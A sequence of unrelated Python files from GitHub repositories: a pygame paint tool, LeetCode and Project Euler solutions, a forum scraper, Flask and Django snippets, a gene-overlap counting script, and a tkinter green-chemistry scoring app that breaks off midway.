draw.rect(screen,color,(mx-(evensize)//2,my-(evensize)//2,evensize,evensize))
for trueorfalse in oneselectbools:
if trueorfalse:
#polygon is a special tool using both clicks :. in seperate loop
if oneselect[oneselectbools.index(trueorfalse)] == "poly":
if Rect(canvas).collidepoint(mx,my):
if left:
points.append((mx,my)) #put mouse pos in list when you left click
cop = screen.copy()
#size set on first click
if len(points) == 0:
setsize = size
#drawing "line" from the last clicked position to current mouse position
if len(points)>0:
lastx,lasty = points[-1]
hyp = int(hypot(mx-lastx,my-lasty))
screen.blit(cop,(0,0))
for i in range(hyp):
draw.circle(screen,color,(lastx+int((mx-lastx)/hyp*i),lasty+int((my-lasty)/hyp*i)),setsize)
#right click to close polygon between first and last points in pointlist
if right:
points.append((mx,my))
if len(points) > 0:
end1x,end1y = points[-1]
end2x,end2y = points[0]
hyp = int(hypot(end2x-end1x,end2y-end1y))
for i in range(hyp):
draw.circle(screen,color,(end1x+int((end2x-end1x)/hyp*i),end1y+int((end2y-end1y)/hyp*i)),setsize)
#resetting
points = []
for trueorfalse in oneselectbools: #more loop beginnings needed to take care of case where polygon is used and so nothing is true therefore fill
#cannot exist in loop because nothing is true
if trueorfalse:
#fill is a special tool using a points set
#change every adjacent color with the same color
#initial click point and color
if oneselect[oneselectbools.index(trueorfalse)] == "fill": #if tool is fill
#first click
if (left or right) and Rect(canvas).collidepoint(mx,my) and screen.get_at((mx,my)) != color:
fillps.add((mx,my))
fillcol = screen.get_at((mx,my))
screen.set_at((mx,my),color)
#while loop goes through every adjacent pixel from the click and spreads out, applicable pixels only need to be put in the set once
if fillcol != False:
while len(fillps)>0:
fx,fy = fillps.pop()
for adx in [-1,1]:
for ady in [-1,1]:
if screen.get_at((fx+adx,fy+ady)) == fillcol and ((fx+adx,fy+ady) not in fillps):
fillps.add((fx+adx,fy+ady))
screen.set_at((fx+adx,fy+ady),color)
#reset after loop
fillps = set()
#===============================================================
#STAMPS
#same code for every stamp
#==============================================================
#a bit of debugging
#if any function button is clicked while a stamp is selected it will blit it and do the function at the same time and cause problems
functionclick = False
for but in funtsbuts:
if Rect(but).collidepoint(mx,my):
functionclick = True
for trueorfalse in oneselectbools:
if trueorfalse:
if mb[0] == 1 and not functionclick:
#calvin stamp
if oneselect[oneselectbools.index(trueorfalse)] == "calvin":
length,width = calvinpng.get_rect().size #gets dimensions of image
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(calvinpng,(mx-length//2,my-width//2)) #centers image to mouse
#moe stamp
if oneselect[oneselectbools.index(trueorfalse)] == "moe":
length,width = moepng.get_rect().size
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(moepng,(mx-length//2,my-width//2))
#hobbes stamp
if oneselect[oneselectbools.index(trueorfalse)] == "hobbes":
length,width = hobbespng.get_rect().size
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(hobbespng,(mx-length//2,my-width//2))
#wagon stamp
if oneselect[oneselectbools.index(trueorfalse)] == "wagon":
length,width = wagonpng.get_rect().size
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(wagonpng,(mx-length//2,my-width//2))
#walking stamp
if oneselect[oneselectbools.index(trueorfalse)] == "walking":
length,width = walkingpng.get_rect().size
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(walkingpng,(mx-length//2,my-width//2))
#zombies stamp
if oneselect[oneselectbools.index(trueorfalse)] == "zombies":
length,width = zombiespng.get_rect().size
if left:
cop = screen.copy()
screen.blit(cop,(0,0))
screen.blit(zombiespng,(mx-length//2,my-width//2))
screen.set_clip()
omx,omy = mx,my
#==============================================================
display.flip()
quit()
| andy-liuu/Paint-Project | updatedpaint.py | updatedpaint.py | py | 37,567 | python | en | code | 0 | github-code | 36 |
1165604872 | # https://leetcode.com/problems/subsets/
# Total subsets for an arr of len n is 2 power n
# Each subset is represented by binary representation of this total
# for ex. if n = 3
# total subsets is 8 viz. 2 power 3
# subset0 would be 000, subset1 = 001, subset2 = 010, subset3 = 011 and so on.
# if one is found in binary number then include num[index] where index is position of 1 in binary number
# for ex in 000 donot include any item in subset
# for 001 include only 3rd item (nums[2]) in subset
# for 010 include 2nd item (nums[1]) in subset
# 011 include 2nd and 3rd item (nums[1] and nums[2]) in subset
from typing import List
class Solution:
def _getbinary(self, num):
res: List[int] = []
while num > 0:
mod = num % 2
res.append(mod)
num = num // 2
return res
def subsets(self, nums: List[int]) -> List[List[int]]:
# init list
res: List = []
total= pow(2, len(nums))
for i in range(total):
bin_arr = self._getbinary(i)
index: int = 0
sub_set: List[int] = []
while(index < len(bin_arr)):
if (bin_arr[index] == 1):
sub_set.append(nums[index])
index += 1
res.append(sub_set)
return res
if __name__ == '__main__':
print(Solution().subsets([1, 2, 3]))
| acharyarajiv/leetcode | medium/subsets.py | subsets.py | py | 1,423 | python | en | code | 0 | github-code | 36 |
11695978241 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/3/27 16:43
# @Author : TanLHHH
# @Site :
# @File : tieba.py
# @Software: PyCharm
import requests,re
url = "https://tieba.baidu.com/f?kw=%E6%96%B0%E5%9E%8B%E5%86%A0%E7%8A%B6%E7%97%85%E6%AF%92&ie=utf-8&pn=0"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
"Host": "tieba.baidu.com"
}
res = requests.get(url=url,headers=headers)
#print(res.content.decode('utf-8'))
pat = '<a rel="noreferrer" href="/p/(.*?)" title="(.*?)" target="_blank" class="j_th_tit ">'
title_list = re.compile(pat, re.S).findall(res.content.decode('utf-8'))
#url_pat = 'class="frs-author-name j_user_card " href="(.*?)" target="_blank">'
pat = 'title="主题作者:.*?".*? href="/home/main/(.*?)" target="'
url_list = re.compile(pat,re.S).findall(res.content.decode('utf-8'))
print(res.content.decode('utf-8'))
# print(res.status_code)
# print(title_list)
# print(title_list[0][0],title_list[0][1])
print(url_list)
print(len(url_list)) | TanLHHHH/Spiders | 测试文件夹/tieba.py | tieba.py | py | 1,112 | python | en | code | 3 | github-code | 36 |
14086957906 | import json
import networkx as nx
import matplotlib.pyplot as plt
def get_topology(edges):
g = nx.Graph()
l3edges_json = json.loads(edges.to_json(orient="index"))
for k in l3edges_json:
neighbor = l3edges_json[k]
node_id = neighbor["Interface"]["hostname"]
remote_node_id = neighbor["Remote_Interface"]["hostname"]
g.add_edge(node_id, remote_node_id)
return g
def get_figure(pframe):
"""
Plots Pandas data frame
"""
g = get_topology(pframe)
# Calculate spring layout
pos = nx.spring_layout(g)
# Draw the graph using matplotlib within Streamlit
fig, ax = plt.subplots()
nx.draw(g, pos, with_labels=True, ax=ax, node_size=1000, font_color="white")
return fig
| martimy/Bat-Q | pages/common/plotting.py | plotting.py | py | 756 | python | en | code | 1 | github-code | 36 |
9659540801 | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 23 14:40:11 2019
@author: hoangt1
"""
#ANSWER: 748317
#NOTE: 1 is not prime
def reversed_num(n):
reversed_n=0
while(n>0):
remainder=n%10
reversed_n=reversed_n*10+remainder
n=n//10
return reversed_n
def is_prime(n):
if n==1: return 0
for i in range(2,int(n**0.5)+1):
if n%i==0: return 0
return 1
def is_truncatable_prime(n):
if not is_prime(n): return 0
# right -> left truncation
n1=n
n2=n
while n1>10:
r2l_trunc=n1//10
if not is_prime(r2l_trunc):
return 0
n1=r2l_trunc
# left -> right truncation
while n2>10:
rev_n=reversed_num(n2)
l2r_truc=reversed_num(rev_n//10)
if not is_prime(l2r_truc):
return 0
n2=l2r_truc
return 1
def calculation():
n=11
counter=0
s=0
while(counter<11):
n+=2 #Only odd numbers will be checked
if is_truncatable_prime(n):
print(n)
counter+=1
s+=n
print(s)
calculation()
| trung-hn/Project-Euler | Solution/prob37.py | prob37.py | py | 1,089 | python | en | code | 1 | github-code | 36 |
37071867440 | from flask import Flask,render_template,redirect,url_for
from flask_bootstrap import Bootstrap
from detail_collector import DetailCollector
app = Flask(__name__)
app.config['Secret_KEY'] = '83hs293C0926jcw2FJ893Bd3E'
Bootstrap(app)
detail = DetailCollector()
@app.route("/")
@app.route("/home")
def home():
return render_template('index.html',details = detail)
| Amari-17/portfolio | app.py | app.py | py | 370 | python | en | code | 0 | github-code | 36 |
14263045240 | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import Account, UserProfile, RefundRequests, FavoriteItem, Preferences
# Register your models here.
class AccountAdmin(UserAdmin):
list_display = ('email', 'first_name', 'last_name', 'username', 'phone_number', 'last_login', 'date_joined', 'is_active')
list_per_page = 60
filter_horizontal = ()
list_filter = ()
fieldsets = ()
ordering = ('date_joined',)
class UserProfileAdmin(admin.ModelAdmin):
list_display = ('user', 'city', 'district', 'province', 'country')
list_per_page = 30
class PreferencesAdmin(admin.ModelAdmin):
list_display = ('user', 'product', 'rating')
list_per_page = 30
class RefundRequestsAdmin(admin.ModelAdmin):
list_display = ('user', 'order_number', 'amount_paid','processed','created_at')
list_editable = ('processed',)
list_per_page = 30
admin.site.register(Account,AccountAdmin)
admin.site.register(UserProfile, UserProfileAdmin)
admin.site.register(RefundRequests, RefundRequestsAdmin)
admin.site.register(FavoriteItem)
admin.site.register(Preferences,PreferencesAdmin) | jeffjcb/southcartel-app | southcartel/accounts/admin.py | admin.py | py | 1,150 | python | en | code | 1 | github-code | 36 |
70894649064 | from queue import PriorityQueue
class Solution:
def splitNum(self, num: int) -> int:
a=[int(x) for x in str(num)]
pq=PriorityQueue()
num1=""
num2=""
for i in a:
pq.put(i)
while not pq.empty():
num1+=str(pq.get())
if not pq.empty():
num2+=str(pq.get())
return int(num1)+int(num2)
| VanshBhargava/Leetcode-Biweekly-Contest-99-Solutions | Split with minimum Sum.py | Split with minimum Sum.py | py | 421 | python | en | code | 1 | github-code | 36 |
32901525311 | import csv
import itertools
import os.path
import sys
if __name__ == "__main__":
#Create ontology dictionary from MEGARes ontology file
#megares_ontology = {}
#ontology_filename = "/home/noyes046/jsettle/argmobrich/MEGARESONTOLOGY.tsv"
#with open(ontology_filename, 'r') as ontology_tsv:
#ontology_reader = csv.reader(ontology_tsv, delimiter='\t')
#for row in ontology_reader:
##Skip column names
#if row[0] == "header":
#continue
#
##FIll in our dict
#megares_ontology[row[0]] = { "class" : row[1],
#"mechanism" : row[2],
#"group" : row[3]
#}
#Go through colocalization results, looking for overlaps
results_filename = sys.argv[1]
overlap_dict ={}
tmp_overlaps = []
with open(results_filename, 'r') as results_csv:
results_reader = csv.reader(results_csv, delimiter='\t')
for row in results_reader:
#Skip column names
if row[0] == "SAMPLE_TYPE":
continue
if row[18] == "No":
#If there were overlaps, record them
if len(tmp_overlaps) > 1:
overlaps_processed = []
for overlap in itertools.product(tmp_overlaps, repeat=2):
#Not interested in alignments to same read
if overlap[0] == overlap[1]:
continue
#(A,B) = (B,A) for this purpose
if (tuple(sorted(overlap)) in overlaps_processed):
continue
if overlap in overlap_dict:
overlap_dict[overlap] += 1
else:
overlap_dict[overlap] = 1
overlaps_processed.append(tuple(sorted(overlap)))
tmp_overlaps = [row[11]]
else: #(row[16] == "Yes")
tmp_overlaps.append(row[11])
sorted_overlaps = sorted(overlap_dict, key = lambda overlap: overlap_dict[overlap], reverse=True)
#Write tsv for overlap counts
with open(os.path.splitext(os.path.basename(sys.argv[1]))[0] + "_overlaps.tsv", 'w') as coloc_tsv:
coloc_writer = csv.writer(coloc_tsv, delimiter='\t')
coloc_writer.writerow([os.path.splitext(os.path.basename(sys.argv[1]))[0][:6] + " overlaps"])
coloc_writer.writerow([])
coloc_writer.writerow(["Overlap Pair", "Occurrences"])
for overlap in sorted_overlaps:
coloc_writer.writerow([overlap, overlap_dict[overlap]])
| settj/argmobrich_analysis | colocalization/gen_overlap.py | gen_overlap.py | py | 2,748 | python | en | code | 0 | github-code | 36 |
31571764321 | # _ __ _ __
# | | /| / /| | /| / / GREEN ANALYTICAL INDEX GENERATOR
# | |/ |/ / | |/ |/ / W.Wojnowski 2020
# |__/|__/ |__/|__/ v.0.3 (alpha)
#
#
from tkinter import *
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.colors import LinearSegmentedColormap
from tkinter import ttk
from tkinter import filedialog
import tkinter.messagebox
import webbrowser
from math import log
from fpdf import FPDF
import os
from datetime import datetime
#***************** SPLASH SCREEN *******************************
root = Tk()
# show no frame
root.overrideredirect(True)
width = root.winfo_screenwidth()
height = root.winfo_screenheight()
root.geometry('%dx%d+%d+%d' % (width*0.5, height*0.5, width*0.1, height*0.1))
image_file = "zaprawa_klejowa.gif"
#assert os.path.exists(image_file)
# use Tkinter's PhotoImage for .gif files
image = PhotoImage(file=image_file)
canvas = Canvas(root, height=height*0.5, width=width*0.5, bg="black")
canvas.create_image(width*0.5/2, height*0.5/2, image=image)
canvas.pack()
# show the splash screen for 5000 milliseconds then destroy
root.after(5000, root.destroy)
root.mainloop()
# **************** MAIN PROGRAM *******************************
root = Tk()
# app title:
root.title('Analytical Method Green Index Calculator')
# default app size:
root.geometry('800x500')
root.minsize(800, 500)
# root.configure(bg='white')
# create the small icon in the task bar:
root.iconbitmap('PG_favicon.ico')
# *********************** Functions ****************************
def clearFrame(frame):
frame.destroy()
global rightFrame
rightFrame = Frame(root, width=300, height=450, padx=20)
rightFrame.pack(side=RIGHT)
# Image save dialog:
def saveImage():
ftypes = [('PNG file', '.png'), ('All files', '*')] #, ('JPG file', '.jpg') - seems that .jpg is not supported by some module
filename = filedialog.asksaveasfilename(filetypes=ftypes, defaultextension='.png')
# save the plot in the specified path; the 'tight' option removes the whitespace from around the figure:
plt.savefig(filename, bbox_inches='tight')
# temporary placeholder function:
def doNothing():
print("ok ok I won't...")
# create the popup window with some additional information:
def popup_bonus():
win = Toplevel()
win.wm_title("About Green Index")
win.iconbitmap('PG_favicon.ico')
def callback(event):
webbrowser.open_new(event.widget.cget("text"))
popup_label1 = Label(win, text='v. 0.1 2020 \n(c) Gdańsk University of Technology', justify=LEFT)
popup_label1.grid(row=0, column=0, padx=8, pady=8)
popup_label2 = Label(win, text=r'http://www.chem.pg.edu.pl/kcha', fg='blue', cursor='hand2', justify=LEFT)
popup_label2.grid(row=1, column=0, padx=8, pady=8)
popup_label2.bind('<Button-1>', callback)
popup_label3 = Label(win, text='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus convallis non sem ut aliquet. Praesent tempus fringilla suscipit. Phasellus tellus massa, semper et bibendum quis, rhoncus id neque. Sed euismod consectetur elit id tristique. Sed eu nibh id ante malesuada condimentum. Phasellus luctus finibus luctus. Pellentesque mi tellus, condimentum sit amet porta sit amet, ullamcorper quis elit. Pellentesque eu mollis nulla. Quisque vulputate, sem at iaculis vehicula, dui orci aliquet lectus, in facilisis odio dolor ut leo. Vivamus convallis hendrerit est luctus ornare. Nullam augue nisi, aliquam sit amet scelerisque hendrerit, pretium vel dui. Pellentesque sed tortor mollis, imperdiet quam quis, scelerisque erat. Vestibulum quis mollis dolor.',
wraplength=300, justify=LEFT, bg='white')
popup_label3.grid(row=2, column=0, padx=8, pady=8)
popup_button = Button(win, text="Close", command=win.destroy)
popup_button.grid(row=3, column=0, padx=8, pady=8)
# connect a float in range 0.0 : 1.0 to a colour in a spectrum from red to yellow to green (256 discrete colour values):
def colorMapper(value):
cmap = LinearSegmentedColormap.from_list('rg', ["red", "yellow", "green"], N=256)
mapped_color = int(value * 255)
color = cmap(mapped_color)
return color
# function for refreshing the canvas:
def destroyCanvas(canvas):
canvas.destroy()
# the final score variable:
entry_text = StringVar()
def printScore():
try:
global score
score = (var_1 * weight_1.get()
+ var_2 * weight_2.get()
+ var_3 * weight_3.get()
+ var_4 * weight_4.get()
+ var_5 * weight_5.get()
+ var_6 * weight_6.get()
+ var_7 * weight_7.get()
+ var_8 * weight_8.get()
+ var_9 * weight_9.get()
+ var_10 * weight_10.get()
+ var_11 * weight_11.get()
+ var_12 * weight_12.get())/(weight_1.get() + weight_2.get() + weight_3.get() + weight_4.get() + weight_5.get() +
weight_6.get() + weight_7.get() +
weight_8.get() + weight_9.get() + weight_10.get() + weight_11.get() + weight_12.get())
# set the final score as a text string rounded to 2 decimals:
entry_text.set(str(round(score, 2)))
print(' \n Total score: %s, rounded: %s' % (str(score), str(round(score, 2))))
print('Criteria scores:')
except NameError:
tkinter.messagebox.showerror(title='Name Error', message='Please set all 12 variables.')
# a function to refresh the chart:
def chartPlotter(event=None):
printScore(), clearFrame(rightFrame), pieChart(), print_variables()
# interface for assigning custom weights to the 12 variables:
def weightChoice(row, column, tab, weightVar):
chckbxVar = StringVar()
chckbxVar.set('disabled')
radioVar = IntVar()
radioVar.set(1)
radio_1 = ttk.Radiobutton(tab, text='1', variable=radioVar, value=1)
radio_2 = ttk.Radiobutton(tab, text='2', variable=radioVar, value=2)
radio_3 = ttk.Radiobutton(tab, text='3', variable=radioVar, value=3)
radio_4 = ttk.Radiobutton(tab, text='4', variable=radioVar, value=4)
radio_1.grid(row=row + 1, column=column, sticky='sw', padx=(70, 0))
radio_2.grid(row=row + 1, column=column, sticky='sw', padx=(100, 0))
radio_3.grid(row=row + 1, column=column, sticky='sw', padx=(130, 0))
radio_4.grid(row=row + 1, column=column, sticky='sw', padx=(160, 0))
radio_1.config(state = DISABLED)
radio_2.config(state = DISABLED)
radio_3.config(state = DISABLED)
radio_4.config(state = DISABLED)
def printRadioVar():
weightVar.set(radioVar.get())
chartPlotter()
weight_button = ttk.Button(tab, text='Set weight', command=printRadioVar)
weight_button.grid(row=row + 1, column=column, sticky='sw', padx=(190, 0))
weight_button.config(state = DISABLED)
def printCheckbox():
radios = (radio_1, radio_2, radio_3, radio_4)
if chckbxVar.get() == 'disabled':
radioVar.set(1)
weightVar.set(1)
for radio in radios:
radio.config(state = DISABLED if chckbxVar.get() == 'disabled' else NORMAL)
weight_button.config(state = DISABLED if chckbxVar.get() == 'disabled' else NORMAL)
ttk.Checkbutton(tab, text='Modify default weights', command=lambda: [printCheckbox()], variable=chckbxVar, onvalue='enabled', offvalue='disabled').grid(row=row, column=column,
columnspan=4, sticky='w', padx=8,
pady=(60, 0))
Label(tab, text='Weight: ').grid(row=row + 1, column = column, sticky='sw', padx=8)
# ********** Main menu ***********************************************************************************
menu = Menu(root)
# configure the menu:
root.config(menu=menu)
FileMenu = Menu(menu)
editMenu = Menu(menu)
# add drop-down functionality:
menu.add_cascade(label='File', menu=FileMenu)
FileMenu.add_command(label='Info', command=popup_bonus)
FileMenu.add_separator()
FileMenu.add_command(label='Save image', command=saveImage)
# FileMenu.add_command(label='Exit', command=doNothing)
# menu.add_cascade(label='Edit', menu=editMenu)
# editMenu.add_command(label='Redo', command=doNothing)
# ******** Statusbar *************
def createStatusBar():
status = ttk.Label(root, textvariable=status_string, bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
status_string = StringVar()
# status_string.trace('w', createStatusBar)
status_string.set('test test')
status = ttk.Label(root, textvariable=status_string, borderwidth=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
# status = Label(root, text=status_string.get(), bd=1, relief=SUNKEN, anchor=W)
# status.pack(side=BOTTOM, fill=X)
# ******** Two separate frames ******
leftFrame = Frame(root, bd=1, width=300, height=450)
rightFrame = Frame(root, width=300, height=450, padx=20)
bottomFrame = Frame(root, bd=1)
leftFrame.pack(side=LEFT, anchor=N)
rightFrame.pack(side=RIGHT)
bottomFrame.pack(side=BOTTOM, anchor=W)
# ************************* Tabs ***************************
# create tabs:
tab_parent = ttk.Notebook(leftFrame, height=400)
tab1 = ttk.Frame(tab_parent)
tab2 = ttk.Frame(tab_parent)
tab3 = ttk.Frame(tab_parent)
tab4 = ttk.Frame(tab_parent)
tab5 = ttk.Frame(tab_parent)
tab6 = ttk.Frame(tab_parent)
tab7 = ttk.Frame(tab_parent)
tab8 = ttk.Frame(tab_parent)
tab9 = ttk.Frame(tab_parent)
tab10 = ttk.Frame(tab_parent)
tab11 = ttk.Frame(tab_parent)
tab12 = ttk.Frame(tab_parent)
# add tabs to the tab parent:
tab_parent.add(tab1, text="1")
tab_parent.add(tab2, text="2")
tab_parent.add(tab3, text="3")
tab_parent.add(tab4, text="4")
tab_parent.add(tab5, text="5")
tab_parent.add(tab6, text="6")
tab_parent.add(tab7, text="7")
tab_parent.add(tab8, text="8")
tab_parent.add(tab9, text="9")
tab_parent.add(tab10, text="10")
tab_parent.add(tab11, text="11")
tab_parent.add(tab12, text="12")
# ****** matplotlib figure ********
weight_1 = IntVar()
weight_2 = IntVar()
weight_3 = IntVar()
weight_4 = IntVar()
weight_5 = IntVar()
weight_6 = IntVar()
weight_7 = IntVar()
weight_8 = IntVar()
weight_9 = IntVar()
weight_10 = IntVar()
weight_11 = IntVar()
weight_12 = IntVar()
weight_1.set(1)
weight_2.set(1)
weight_3.set(1)
weight_4.set(1)
weight_5.set(1)
weight_6.set(1)
weight_7.set(1)
weight_8.set(1)
weight_9.set(1)
weight_10.set(1)
weight_11.set(1)
weight_12.set(1)
# Begin with default values of variables to be able to generate the chart right away:
var_1 = 1.0
var_2 = 1.0
var_3 = 1.0
var_4 = 1.0
var_5 = 1.0
var_6 = 1.0
var_7 = 1.0
var_8 = 1.0
var_9 = 1.0
var_10 = 1.0
var_11 = 1.0
var_12 = 1.0
# function for updating the status bar:
def updateStatusBar():
global status_string
status_string.set(' scores: | (1) %s | (2) %s | (3) %s | (4) %s | (5) %s | (6) %s | (7) %s | (8) %s | (9) %s | (10) %s | (11) %s | (12) %s |'
% (str(round(var_1, 2)),
str(round(var_2, 2)),
str(round(var_3, 2)),
str(round(var_4, 2)),
str(round(var_5, 2)),
str(round(var_6, 2)),
str(round(var_7, 2)),
str(round(var_8, 2)),
str(round(var_9, 2)),
str(round(var_10, 2)),
str(round(var_11, 2)),
str(round(var_12, 2))
))
# generate the pie chart (plot) with a circle decal in the middle:
def pieChart(): #weights, labels, colors
colors = [colorMapper(var_1), colorMapper(var_2), colorMapper(var_3), colorMapper(var_4), colorMapper(var_5), colorMapper(var_6), colorMapper(var_7), colorMapper(var_8), colorMapper(var_9),
colorMapper(var_10), colorMapper(var_11), colorMapper(var_12)]
weights = [weight_1.get(), weight_2.get(), weight_3.get(), weight_4.get(), weight_5.get(), weight_6.get(), weight_7.get(), weight_8.get(), weight_9.get(), weight_10.get(), weight_11.get(),
weight_12.get()]
labels = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12']
index_value = float(entry_text.get())
fig, ax = plt.subplots(figsize=(3, 3), dpi=150)
ax.clear()
ax.axis('equal')
radius = 1.0
pie2 = ax.pie(weights, radius=radius, colors=colors, labeldistance=(radius * 0.875), labels=labels,
rotatelabels=False, startangle=90, counterclock=False,
wedgeprops={"edgecolor": "black", 'linewidth': 1}, textprops={'fontsize': (radius * 10)})
plt.setp(pie2[1], rotation_mode="anchor", ha="center", va="center")
for tx in pie2[1]:
rot = tx.get_rotation()
tx.set_rotation(rot)
# if you want rotated labels:
# tx.set_rotation(rot+ 90 + (1 - rot // 180) * 180)
circle = plt.Circle(xy=(0, 0), radius=(radius * 0.75), facecolor=colorMapper(index_value), edgecolor='black',
linewidth=1)
plt.gca().add_artist(circle)
ax.text(0.5, 0.5, str(index_value),
verticalalignment='center', horizontalalignment='center',
transform=ax.transAxes,
color='black', fontsize=(radius * 40))
fig.tight_layout() # for exporting a compact figure
# Pack the figure into a canvas:
canvas = FigureCanvasTkAgg(fig, master=rightFrame) # A tk.DrawingArea.
plot_widget = canvas.get_tk_widget()
plot_widget.pack(side=TOP)
# print(weight_12.get())
# **************************************
# define a temporary function to test the printing of global variables:
def print_variables():
try:
print ('var_1: ' + str(var_1))
print('var_2: ' + str(var_2))
print('var_3: ' + str(var_3))
print('var_5: ' + str(var_5))
print('var_6: ' + str(var_6))
print('var_7: ' + str(var_7))
print('var_8: ' + str(var_8))
print('var_9: ' + str(var_9))
print('var_10: ' + str(var_10))
print('var_11: ' + str(var_11))
print('var_12: ' + str(var_12))
updateStatusBar()
except NameError:
tkinter.messagebox.showerror(title='Name error',
message='Please fill all the variables')
# generate tab captions and prompt captions:
def tab(tab_no, text1, text2):
Label(tab_no, text=text1, wraplength=300, justify=LEFT).grid(sticky='w', row=0, column=0, padx=8, pady=8)
Label(tab_no, text=text2, wraplength=300, justify=LEFT).grid(sticky='w', row=1, column=0, padx=8, pady=8)
# *****************************************************************************************************************
# TAB 1
# *****************************************************************************************************************
content_1 = tab(tab1, text1='Direct analytical techniques should be applied to avoid sample treatment.',
text2='Select the sampling procedure:')
# Create a Tkinter variable
var_1_text = StringVar(tab1)
# Dictionary with options
var_1_text_choices = {'Remote sensing without sample damage': 1.0,
'Remote sensing with little physical damage': 0.95,
'Non-invasive analysis': 0.9,
'In-field sampling and direct analysis': 0.85,
'In-field sampling and on-line analysis': 0.78,
'On-line analysis': 0.70,
'At-line analysis': 0.60,
'Off-line analysis': 0.48,
'External sample pre- and treatment and batch analysis (reduced number of steps)': 0.30,
'External sample pre- and treatment and batch analysis (large number of steps)': 0.0}
var_1_text.set('SAMPLING PROCEDURE')
dropDown_1 = OptionMenu(tab1, var_1_text, *var_1_text_choices.keys())
dropDown_1.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_1.grid(sticky='w', row=2, column=0, padx=8, pady=8)
# on change dropdown value, get the dictionary value and modify the global variable
    def change_dropdown_1(*args):
        """Trace callback for the Principle 1 dropdown: map the selected caption to its score and redraw the chart."""
        # Define the global variable for Principle 1:
        global var_1
        var_1 = None
        var_1 = var_1_text_choices[var_1_text.get()]
        print('var_1:' + str(var_1))
        chartPlotter()
# link function to change dropdown
# The trace method of the StringVar allows to detect the change in the variable that activate a call to a function
var_1_text.trace('w', change_dropdown_1)
W_1 = weightChoice(10, 0, tab1, weight_1)
# *****************************************************************************************************************
# TAB 2
# *****************************************************************************************************************
content_2 = tab(tab2, text1='Minimal sample size and minimal number of samples are goals.',
text2='Enter the amount of sample in either g or mL:')
amount_var = StringVar()
amount_var.set('input')
sample_amount_entry = ttk.Entry(tab2, textvariable=amount_var, width=15)
sample_amount_entry.grid(sticky='w', row=2, column=0, padx=8, pady=8)
# the event=None is passed so that the entry.bind does not return a positional argument
def change_entry_2(event=None):
global var_2
var_2 = None
try:
if float(amount_var.get()) > 100:
var_2 = 0
elif float(amount_var.get()) < 0.1:
var_2 = 1.0
else:
var_2 = abs(-0.142 * log(float(amount_var.get())) + 0.65) # absolute value to avoid negative values
print('var_2:' + str(var_2))
except ValueError:
tkinter.messagebox.showerror(title='Value error', message='The amount has to be a float or an intiger, e.g. 0.14 or 21.')
chartPlotter()
# bind the <Return> key to the entry window, so that the function gets called as an alternative to the 'set' button:
sample_amount_entry.bind('<Return>', change_entry_2)
# insert a button that does the same:
ttk.Button(tab2, text='Set', command=change_entry_2).grid(row=2, column=0, padx=8, pady=8)
W_2 = weightChoice(10, 0, tab2, weight_2)
# *****************************************************************************************************************
# TAB 3
# *****************************************************************************************************************
content_3 = tab(tab3, 'If possible, measurements should be performed in situ.',
'What is the positioning of the analytical device?')
# Create a Tkinter variable
var_3_text = StringVar(tab3)
# Dictionary with options
var_3_text_choices = {'off-line': 0.0,
'at-line': 0.33,
'on-line': 0.66,
'in-line': 1.0}
var_3_text.set('select')
dropDown_3 = OptionMenu(tab3, var_3_text, *var_3_text_choices.keys())
dropDown_3.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_3.grid(sticky='w', row=2, column=0, padx=8, pady=8)
# on change dropdown value, get the dictionary value and modify the global variable
def change_dropdown_3(*args):
global var_3
var_3 = None
var_3 = var_3_text_choices[var_3_text.get()]
print('var_3:' + str(var_3))
chartPlotter()
# link function to change dropdown
# The trace method of the StringVar allows to detect the change in the variable that activate a call to a function
var_3_text.trace('w', change_dropdown_3)
W_3 = weightChoice(10, 0, tab3, weight_3)
# *************************** TAB 4 ************************************************************************************
content_4 = tab(tab4, text1='Integration of analytical processes and operations saves energy and reduces the use of reagents.',
text2='How many major, distinct steps are there in the sample preparation procedure? These include e.g. sonication,'
' mineralization, centrifugation, derivatization, extraction, etc.')
var_4_text = StringVar(tab4)
# Dictionary with options
var_4_text_choices = {'3 or fewer': 1.0,
'4': 0.8,
'5': 0.6,
'6': 0.4,
'7': 0.2,
'8 or more': 0.0}
var_4_text.set('select')
dropDown_4 = OptionMenu(tab4, var_4_text, *var_4_text_choices.keys())
dropDown_4.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_4.grid(sticky='w', row=2, column=0, padx=8, pady=8)
# on change dropdown value, get the dictionary value and modify the global variable
    def change_dropdown_4(*args):
        """Trace callback for the Principle 4 dropdown: map the selected number of preparation steps to a score."""
        global var_4
        var_4 = None
        var_4 = var_4_text_choices[var_4_text.get()]
        print('var_4:' + str(var_4))
        chartPlotter()
# link function to change dropdown
# The trace method of the StringVar allows to detect the change in the variable that activate a call to a function
var_4_text.trace('w', change_dropdown_4)
W_4 = weightChoice(10, 0, tab4, weight_4)
# *****************************************************************************************************************
# TAB 5
# *****************************************************************************************************************
content_5 = tab(tab5, text1='Automated and miniaturized methods should be selected.', text2='Degree of automation:')
# Create a Tkinter variable
var_5a_text = StringVar(tab5)
# Dictionary with options
var_5a_text_choices = {'automatic': 1.0,
'semi-automatic': 0.5,
'manual': 0.0}
var_5a_text.set('select')
dropDown_5a = OptionMenu(tab5, var_5a_text, *var_5a_text_choices.keys())
dropDown_5a.config(wraplength=250, bg='white', justify=LEFT, width=40, anchor='w')
dropDown_5a.grid(sticky='w', row=2, column=0, padx=8, pady=8)
var_5a = DoubleVar(tab5)
